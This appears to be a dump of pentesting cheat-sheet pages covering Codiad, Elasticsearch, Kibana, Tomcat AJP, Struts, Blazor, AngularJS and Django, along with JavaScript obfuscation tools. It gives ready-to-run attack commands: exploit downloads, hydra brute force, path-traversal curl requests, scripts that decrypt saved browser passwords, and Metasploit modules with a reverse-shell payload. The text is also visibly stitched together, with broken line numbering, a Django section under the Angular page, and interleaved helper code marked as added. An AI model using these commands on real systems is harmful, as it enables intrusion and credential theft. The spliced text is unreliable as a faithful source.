6 | draft: false
7 | ---
8 |
9 | ## Deobfuscation
10 |
11 | - **JavaScript**
12 |
13 | - **[JavaScript Deobfuscator](https://deobfuscate.io/)**
14 |
15 |
16 |
17 | ## Obfuscation
18 |
19 | 1. **JavaScript**
20 |
21 | - **Manual Obfuscation**
22 |
23 | 1. Access [https://obfuscator.io/](https://obfuscator.io/).
24 |
25 | 2. Change “String Array Encoding” to “Base64”.
26 |
27 | 3. Paste JavaScript code.
28 |
29 | 4. Click "Obfuscate".
30 |
31 | 5. Try running it on [https://jsconsole.com/](https://jsconsole.com/).
32 |
33 | - **Use Online Tools**
34 |
35 | - **[JSFuck](http://www.jsfuck.com/)**
36 |
37 | - **[jjencode](https://utf-8.jp/public/jjencode.html)**
38 |
39 | - **[aaencode](https://utf-8.jp/public/aaencode.html)**
40 |
--------------------------------------------------------------------------------
/src/exploit/web/codiad-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Codiad Pentesting
3 | description: Codiad is a web-based IDE framework.
4 | tags:
5 | - Web
6 | refs:
7 | - https://www.exploit-db.com/exploits/49705
8 | date: 2023-02-26
9 | draft: false
10 | ---
11 |
12 | ## Default Credentials
13 |
14 | ```sh
15 | # Docker image - https://hub.docker.com/r/bitnami/codiad
16 | user:bitnami
17 | ```
18 |
19 |
20 |
21 | ## Enumeration
22 |
23 | ```bash
24 | # Get current directory in the system
25 | /components/project/controller.php?action=get_current
26 | ```
27 |
28 |
29 |
30 | ## Remote Code Execution (RCE) v2.8.4
31 |
32 | ```bash
33 | wget https://www.exploit-db.com/exploits/49705 -O exploit.py
34 |
35 | # Linux
36 | python3 exploit.py https://example.com/ admin admin 4444 linux
37 | # Windows
38 | python3 exploit.py https://example.com/ admin admin 4444 windows
39 | ```
40 |
--------------------------------------------------------------------------------
/src/exploit/web/cookie/_data.yml:
--------------------------------------------------------------------------------
1 | category2: cookie
--------------------------------------------------------------------------------
/src/exploit/web/cookie/session-fixation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Session Fixation
3 | description: Session fixation attacks attempt to exploit the vulnerability of a system that allows one person to fixate another person’s session identifier.
4 | tags:
5 | - Cookie
6 | - Web
7 | refs:
8 | - https://owasp.org/www-community/attacks/Session_fixation
9 | date: 2023-04-15
10 | draft: false
11 | ---
12 |
13 | ## Exploitation
14 |
15 | ### 1. Attacker Logs In to the Website to Get the Session
16 |
17 | An attacker needs to log in to a legitimate website, then get the session value.
18 |
19 | ```bash
20 | Cookie: sessid=abcdef
21 | ```
22 |
23 | ### 2. Attacker Sends the Session Value to Victim
24 |
25 | There are various ways to send the attacker's session value. For example,
26 |
27 | - Send email.
28 | - Predict a session value.
29 | - Eavesdrop on a session using a packet sniffer such as Wireshark.
30 | - XSS
31 |
32 | ```bash
33 |
34 | ```
35 |
36 | ### 3. Victim Logs In with the Attacker's Session
37 |
38 | If the victim logs in while the attacker's session ID is set in the cookie, the attacker can control the victim's account on the website.
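Added example, not part of the page: a minimal Python session store showing the login handler that makes fixation possible beside the fixed handler that regenerates the session ID on authentication (the OWASP recommendation). The class and method names are chosen here and no web framework is assumed.

```python
import secrets


class SessionStore:
    """Minimal in-memory session store, constructed for illustration (not a real framework)."""

    def __init__(self):
        self._sessions = {}  # session id -> {"user": None or username}

    def new_session(self):
        """Issue an anonymous session with an unpredictable ID."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def login_vulnerable(self, presented_sid, user):
        """Keeps whatever ID the client presented, even one the server never issued:
        an attacker who planted `presented_sid` in the victim's browser now shares
        the authenticated session."""
        self._sessions.setdefault(presented_sid, {"user": None})["user"] = user
        return presented_sid

    def login_fixed(self, presented_sid, user):
        """Mitigation: discard the pre-login ID and issue a fresh one after authentication,
        so an ID chosen or learned before login never becomes an authenticated session."""
        self._sessions.pop(presented_sid, None)
        fresh_sid = secrets.token_urlsafe(32)
        self._sessions[fresh_sid] = {"user": user}
        return fresh_sid

    def user_for(self, sid):
        """Who is logged in under `sid`, or None if the ID is unknown or anonymous."""
        session = self._sessions.get(sid)
        return session["user"] if session else None


if __name__ == "__main__":
    fixated = "abcdef"  # the ID from the Cookie example above, planted by the attacker
    store = SessionStore()
    store.login_vulnerable(fixated, "victim")
    print("vulnerable:", store.user_for(fixated))   # attacker's ID is now the victim's session
    store = SessionStore()
    fresh = store.login_fixed(fixated, "victim")
    print("fixed:", store.user_for(fixated), store.user_for(fresh))
```

Regenerating the ID is only half of the fix: the old ID must also be invalidated server-side (the `pop` above), and the new cookie should carry HttpOnly, Secure and SameSite so it cannot be read by injected script or replayed over plain HTTP.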
--------------------------------------------------------------------------------
/src/exploit/web/elasticsearch/_data.yml:
--------------------------------------------------------------------------------
1 | category2: elasticsearch
--------------------------------------------------------------------------------
/src/exploit/web/elasticsearch/elasticsearch-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Elasticsearch Pentesting
3 | description: It is a search engine based on the Lucene library. Default ports are 9200, 9300.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-12-23
8 | draft: false
9 | ---
10 |
11 | ## Default Credentials
12 |
13 | ```txt
14 | admin:elasticadmin
15 | elastic:changeme
16 | ```
17 |
18 |
19 |
20 | ## Brute Force Credentials
21 |
22 | Brute force the HTTP Basic authentication ("Authorization" header) of the web page.
23 |
24 | ```sh
25 | hydra -L usernames.txt -P passwords.txt -s 9200 http-get /
26 | ```
27 |
28 |
29 |
30 | ## Common Directories
31 |
32 | ```bash
33 | /_cat/
34 | /_cat/indices
35 | /_cluster/
36 | /_nodes/
37 | /_remote/
38 | /_security
39 | /_search?q=username
40 | /_search?q=password
41 | /_security/role
42 | /_security/user
43 | /_xpack/security/user/
44 | ```
45 |
--------------------------------------------------------------------------------
/src/exploit/web/elasticsearch/kibana-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Kibana Pentesting
3 | description: A proprietary data visualization dashboard software for Elasticsearch. A default port is 5601.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2022-12-22
8 | draft: false
9 | ---
10 |
11 | ## Vulnerabilities
12 |
13 | ### Local File Inclusion (LFI) Version \< 6.4.3 & 5.6.13
14 | 
15 | Tracked as [CVE-2018-17246](https://nvd.nist.gov/vuln/detail/CVE-2018-17246): the Console plugin's `apis` parameter is not restricted to its own directory, so a traversal sequence makes Kibana load a file of the attacker's choosing. Quote the URL, otherwise the shell treats `&` as a job separator.
16 | 
17 | ```sh
18 | curl 'http://:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt'
19 | ```
20 | 
21 | ### Remote Code Execution (RCE) Version \< 6.6.0
22 | 
23 | Prototype pollution in the Timelion visualizer ([CVE-2019-7609](https://github.com/mpgn/CVE-2019-7609)); the linked PoC abuses it to spawn a reverse shell from the Kibana process.
22 |
--------------------------------------------------------------------------------
/src/exploit/web/extract-web-browser-passwords.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Extract Web Browser Passwords
3 | description: Passwords saved in a web browser can be recovered easily once the device is compromised, by decrypting the browser's login data store.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-06-23
8 | draft: false
9 | ---
10 |
11 | ## Firefox
12 |
13 | ```bash
14 | # Reads logins.json and key4.db from the local Firefox profile; prompts for the primary (master) password if one is set.
15 | wget https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py
16 | python3 firefox_decrypt.py
17 | ```
18 | 
19 | 
20 | 
21 | ## Google Chrome
22 | 
23 | ```bash
24 | # Windows target: decrypts the "Login Data" SQLite database with DPAPI, so run it as the user who owns the Chrome profile.
25 | wget https://raw.githubusercontent.com/ohyicong/decrypt-chrome-passwords/main/decrypt_chrome_password.py
26 | python3 decrypt_chrome_password.py
27 | ```
26 |
--------------------------------------------------------------------------------
/src/exploit/web/framework/_data.yml:
--------------------------------------------------------------------------------
1 | category2: framework
--------------------------------------------------------------------------------
/src/exploit/web/framework/dotnet/_data.yml:
--------------------------------------------------------------------------------
1 | category3: dotnet
--------------------------------------------------------------------------------
/src/exploit/web/framework/dotnet/blazor-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Blazor Pentesting
3 | description: Blazor is a web framework for building interactive web applications using C# instead of JavaScript.
4 | tags:
5 | - .NET
6 | - Web
7 | refs:
8 | date: 2024-11-30
9 | draft: false
10 | ---
11 |
12 | ## Common Directories/Files
13 |
14 | ```bash
15 | # Lists every assembly the app downloads (under "resources.assembly"); each can be fetched and decompiled.
16 | /_framework/blazor.boot.json
17 | /_framework/.dll
18 | ```
19 |
20 |
21 |
22 | ## Reverse Engineering DLLs
23 |
24 | We can decompile DLLs such as `/_framework/.dll` with tools such as **dotPeek** (or ILSpy) to recover sensitive information (credentials, API endpoints, software versions, etc.). Blazor WebAssembly ships the application's own assemblies to the browser, so anything compiled into them is readable by any client.
25 | 
26 | In dotPeek, right-click the assembly name in Assembly Explorer and choose **Decompiled Sources** to browse the code.
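A helper that turns `blazor.boot.json` into the list of assembly URLs to download for decompilation. This is an added example for this page, not the project's code; it assumes the layout seen in public Blazor boot files (`resources.assembly`, `resources.lazyAssembly` and `resources.pdb` mapping file name to integrity hash, `entryAssembly` naming the app assembly, with `mainAssemblyName` as a fallback key), and accepts `.wasm` as well as `.dll` because newer .NET versions can ship assemblies in WebCIL form. `SAMPLE_BOOT` is constructed.

```python
import json
from urllib.parse import urljoin

# Extensions treated as downloadable code/symbol files (assumed set).
CODE_EXTENSIONS = (".dll", ".wasm", ".pdb")


def list_assemblies(boot_json_text):
    """Sorted file names of every assembly (and PDB, if deployed) the app loads."""
    boot = json.loads(boot_json_text)
    resources = boot.get("resources", {})
    names = []
    for section in ("assembly", "lazyAssembly", "pdb"):
        names.extend(resources.get(section, {}))
    return sorted(n for n in names if n.endswith(CODE_EXTENSIONS))


def entry_assembly(boot_json_text):
    """The application's own assembly, the first one worth decompiling."""
    boot = json.loads(boot_json_text)
    return boot.get("entryAssembly") or boot.get("mainAssemblyName")


def download_urls(base_url, boot_json_text):
    """Absolute /_framework/ URLs for every file from list_assemblies()."""
    framework = urljoin(base_url.rstrip("/") + "/", "_framework/")
    return [framework + name for name in list_assemblies(boot_json_text)]


# Constructed boot file standing in for a real /_framework/blazor.boot.json.
SAMPLE_BOOT = json.dumps({
    "entryAssembly": "ShopApp",
    "resources": {
        "assembly": {"ShopApp.dll": "sha256-x", "System.Private.CoreLib.dll": "sha256-y"},
        "lazyAssembly": {"Reports.dll": "sha256-z"},
        "pdb": {"ShopApp.pdb": "sha256-p"},
        "runtime": {"dotnet.wasm": "sha256-r"},
    },
})

if __name__ == "__main__":
    print("entry:", entry_assembly(SAMPLE_BOOT))
    for url in download_urls("https://example.test", SAMPLE_BOOT):
        print(url)
```

A shipped `.pdb` is a bonus: it restores local variable names and line numbers in the decompiler output.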
--------------------------------------------------------------------------------
/src/exploit/web/framework/java/_data.yml:
--------------------------------------------------------------------------------
1 | category3: java
--------------------------------------------------------------------------------
/src/exploit/web/framework/java/ajp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: AJP (Apache JServ Protocol) Pentesting
3 | description: AJP is a binary protocol that can proxy inbound requests from a web server through to an application server that sits behind the web server. A default port is 8009.
4 | tags:
5 | - AJP
6 | - Web
7 | refs:
8 | date: 2022-11-22
9 | draft: false
10 | ---
11 |
12 | ## Enumeration
13 |
14 | ```sh
15 | nmap --script ajp-auth -p 8009
16 | nmap --script ajp-auth --script-args ajp-auth.path=/login -p 8009
17 | nmap --script ajp-brute -p 8009
18 | nmap --script ajp-headers -p 8009
19 | nmap --script ajp-methods -p 8009
20 | nmap --script ajp-request -p 8009
21 | ```
22 |
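Before running the nmap scripts it helps to confirm that port 8009 really speaks AJP rather than HTTP. The check below sends an AJP13 CPing and expects a CPong, following the AJP13 framing (client packets start with `0x12 0x34`, server packets with `AB`, each followed by a 2-byte big-endian payload length; CPing is message type 10, CPong type 9). It is an added example for this page, not the page's own code; the sample replies in the test are constructed.

```python
import socket
import struct

CLIENT_MAGIC = b"\x12\x34"   # client -> container
SERVER_MAGIC = b"AB"         # container -> client
CPING, CPONG = 10, 9         # AJP13 message types


def build_cping():
    """Client packet: magic, 2-byte length, single-byte CPing payload."""
    payload = bytes([CPING])
    return CLIENT_MAGIC + struct.pack(">H", len(payload)) + payload


def parse_server_packet(data):
    """Payload of one server->client packet, or None if the framing is wrong/truncated."""
    if len(data) < 4 or data[:2] != SERVER_MAGIC:
        return None
    (length,) = struct.unpack(">H", data[2:4])
    if len(data) < 4 + length:
        return None
    return data[4:4 + length]


def is_cpong(data):
    """True only for a well-formed one-byte CPong reply."""
    payload = parse_server_packet(data)
    return payload is not None and len(payload) == 1 and payload[0] == CPONG


def ajp_ping(host, port=8009, timeout=5):
    """True if the service on host:port answers CPing with CPong, i.e. it is an AJP connector."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_cping())
        return is_cpong(sock.recv(64))


if __name__ == "__main__":
    import sys
    print("AJP connector:", ajp_ping(sys.argv[1]))
```

An HTTP listener on the same port returns a `HTTP/1.1 400` line instead, which the parser rejects because it lacks the `AB` magic.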
23 |
24 |
25 | ## Ghostcat File Inclusion
26 |
27 | It's a vulnerability of **Tomcat AJP** ([CVE-2020-1938](https://www.exploit-db.com/exploits/49039)): an exposed AJP connector lets a client set request attributes that make Tomcat read any file inside the web application directory, such as `WEB-INF/web.xml`. It only becomes code execution when the attacker can also upload a file (e.g. a JSP) into that directory and have it included.
28 | Use Metasploit for exploiting it.
29 |
30 | ```sh
31 | msfconsole
32 | msf6 > use auxiliary/admin/http/tomcat_ghostcat
33 | msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts
34 | msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit
35 | ```
36 |
--------------------------------------------------------------------------------
/src/exploit/web/framework/java/apache-struts-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Apache Struts Pentesting
3 | description: An open-source web application framework for developing Java EE web applications.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2022-11-22
8 | draft: false
9 | ---
10 |
11 | ## Struts2 OGNL Injection (Content-Type)
12 | 
13 | Metasploit's `struts2_content_type_ognl` module targets the Jakarta multipart parser flaw (CVE-2017-5638), in which an OGNL expression placed in the `Content-Type` header is evaluated by the server. Set `RHOSTS` and `LHOST` before running it.
14 | 
15 | ```sh
16 | msfconsole
17 | msf > use multi/http/struts2_content_type_ognl
18 | msf > set payload linux/x86/meterpreter/reverse_tcp
19 | msf > exploit
20 | 
21 | # Upgrade the meterpreter shell to an interactive bash TTY.
22 | meterpreter > shell
23 | SHELL=/bin/bash script -q /dev/null
24 | ```
--------------------------------------------------------------------------------
/src/exploit/web/framework/javascript/_data.yml:
--------------------------------------------------------------------------------
1 | category3: javascript
--------------------------------------------------------------------------------
/src/exploit/web/framework/javascript/angular-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Angular Pentesting
3 | description: AngularJS is a web application framework.
4 | tags:
5 | - SSTI
6 | - Web
7 | refs:
8 | date: 2023-07-12
9 | draft: false
10 | ---
11 |
12 | ## HTML Attributes
13 |
14 | If a website uses the AngularJS framework, the HTML source contains an `ng-app` attribute (also written `data-ng-app`) on the root element, typically `<html>` or `<body>`, together with other `ng-*` directives, so check for it in the page source. Finding it matters because AngularJS evaluates `{{ }}` expressions in the page client-side, which is what the SSTI tag on this page refers to.
15 | 
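A small fingerprinting helper for the check above. It is an added example for this page, not the page's own code: it looks for the `ng-app` marker (plus the `data-ng-app`/`x-ng-app` spellings AngularJS accepts), collects the other `ng-*` directives, and additionally extracts the library version from a CDN-style script URL such as `.../angularjs/1.8.2/angular.min.js` (that URL layout is an assumption, not something the original page describes). `SAMPLE_HTML` is constructed.

```python
import re

# Root marker: an ng-app attribute on some element (bare or with a value).
NG_APP_RE = re.compile(r"<[a-z][^>]*\s(?:data-|x-)?ng-app(?:[\s=>]|/)", re.I)
# Any other ng-* directive used as an attribute with a value.
NG_DIRECTIVE_RE = re.compile(r"\s(ng-[a-z-]+)=", re.I)
# Version embedded in common CDN paths: angularjs/1.8.2/ or angular.js/1.8.2/ (assumed layout).
VERSION_RE = re.compile(r"angular(?:\.js|js)?[/-](\d+\.\d+\.\d+)/", re.I)


def fingerprint_angularjs(html):
    """Return {"angularjs": bool, "directives": [...], "version": str | None}."""
    has_app = NG_APP_RE.search(html) is not None
    directives = sorted(set(d.lower() for d in NG_DIRECTIVE_RE.findall(html)))
    version_match = VERSION_RE.search(html)
    return {
        "angularjs": has_app or bool(directives),
        "directives": directives,
        "version": version_match.group(1) if version_match else None,
    }


# Constructed page standing in for a fetched HTML response.
SAMPLE_HTML = """<!doctype html>
<html ng-app="shopApp">
<head>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.8.2/angular.min.js"></script>
</head>
<body ng-controller="CartCtrl">
<input ng-model="query"><p ng-bind="total"></p>
</body></html>"""

if __name__ == "__main__":
    print(fingerprint_angularjs(SAMPLE_HTML))
```

The version is worth recording because expression-sandbox bypasses are specific to AngularJS release ranges, and the sandbox was removed entirely in 1.6.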
23 | ## Bypass ALLOWED_HOSTS
24 |
25 | If we get the error **“Invalid HTTP_HOST header: 'x.x.x.x:8000'. You may need to add 'x.x.x.x' to ALLOWED_HOSTS"** when accessing a website written in Django, the server is rejecting the `Host` header we sent. Intercept the request (for example with Burp Suite) and change the `Host` header to a value the application allows. The detailed message only appears with `DEBUG = True`, and in that mode an empty `ALLOWED_HOSTS` still accepts `localhost`, `127.0.0.1` and `[::1]`, which is why the values below usually work on a development server.
26 | Then you should be able to access the website.
27 |
28 | ```bash
29 | Host: 0.0.0.0:8000
30 | # or
31 | Host: 127.0.0.1:8000
32 | ```
33 |
34 | Or if we can have the permission to edit the configuration of the website, add new IP address to **ALLOWED_HOSTS** in **`settings.py`**.
35 |
36 | ```python
37 | ALLOWED_HOSTS = ['0.0.0.0', '127.0.0.1', 'x.x.x.x']
38 | ```
39 |
40 |
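To see why `127.0.0.1:8000` passes while `x.x.x.x:8000` is refused, here is a simplified model of Django's `ALLOWED_HOSTS` matching: the port is split off and ignored, `*` matches anything, a leading `.` matches a domain and its subdomains, and with `DEBUG = True` an empty list falls back to the localhost entries Django documents. This is an added illustration written for this page, not Django's own code, and it omits Django's syntax validation of the host value; `10.0.0.5` stands in for the page's `x.x.x.x`.

```python
# Fallback Django applies when DEBUG is True and ALLOWED_HOSTS is empty.
DEBUG_FALLBACK = [".localhost", "127.0.0.1", "[::1]"]


def split_domain_port(host):
    """Lower-cased (domain, port) from a Host header; handles bracketed IPv6."""
    host = host.lower()
    if host.startswith("["):
        end = host.find("]")
        return host[:end + 1], host[end + 2:]
    if host.count(":") == 1:
        domain, port = host.split(":")
        return domain, port
    return host, ""


def is_same_domain(domain, pattern):
    """Exact match, or subdomain match when the pattern starts with a dot."""
    pattern = pattern.lower()
    if not pattern:
        return False
    if pattern.startswith("."):
        return domain.endswith(pattern) or domain == pattern[1:]
    return domain == pattern


def host_allowed(host_header, allowed_hosts, debug=False):
    """True if Django would accept this Host header under these settings."""
    if debug and not allowed_hosts:
        allowed_hosts = DEBUG_FALLBACK
    domain, _port = split_domain_port(host_header)
    return bool(domain) and any(p == "*" or is_same_domain(domain, p) for p in allowed_hosts)


if __name__ == "__main__":
    for header in ("10.0.0.5:8000", "127.0.0.1:8000", "[::1]:8000"):
        print(header, "->", host_allowed(header, [], debug=True))
    print("after adding 10.0.0.5 ->", host_allowed("10.0.0.5:8000", ["0.0.0.0", "127.0.0.1", "10.0.0.5"]))
```

The model also shows the trade-off of the quick fix: `'*'` silences the error for every host, which re-enables Host header attacks (cache poisoning, password-reset links pointing at an attacker's domain), so add the specific hostname instead.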